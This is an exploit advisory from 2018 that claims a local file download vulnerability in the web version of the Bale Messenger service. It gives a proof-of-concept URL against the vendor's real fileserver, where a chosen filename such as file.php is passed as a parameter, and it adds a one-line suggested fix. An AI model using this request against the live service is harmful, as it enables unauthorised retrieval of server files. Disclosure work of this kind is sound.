[+] Exploit Title ; Bale Messenger Web Version Local File Download(LFD) Vulnerability
[+] Date : 2018-04-07
[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : https://bale.ai/
[+] Dork : N/A
[+] Forum : irethicalhackers.com/forums
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Description :
[!] Bale is An extremely powerful and popular instant messenger
[!] Bale Has three versions of the desktop - Web and mobile.
[!] More than 100,000 users use it in Iran You can Download it from App Store And bazar
[+] Poc :
[+] Video :
[!]
[!] Open the link and enter the filename.
[!] https://fileserver-c002.bale.ai/cvpO7QesMbIG4PyrDTHPqke9i4cKVsLrTf4kUReeQjjrRetjbVZsCS6QQHxF6GNi?filename=Your File Name
[!] For Ex :
[!] https://fileserver-c002.bale.ai/cvpO7QesMbIG4PyrDTHPqke9i4cKVsLrTf4kUReeQjjrRetjbVZsCS6QQHxF6GNi?filename=file.php
[+] Security Level :
[!] Medium
[+] Exploitation Technique:
[!] Remote
[+] Request Method :
[!] GET
[+] Vulnerability Files :
[!] Index
[+] Fix :
[!] Restrict user input or replace bad characters
[+] We Are : [+] 0P3N3R [+] Mehrdad_Ice [+] S0!hp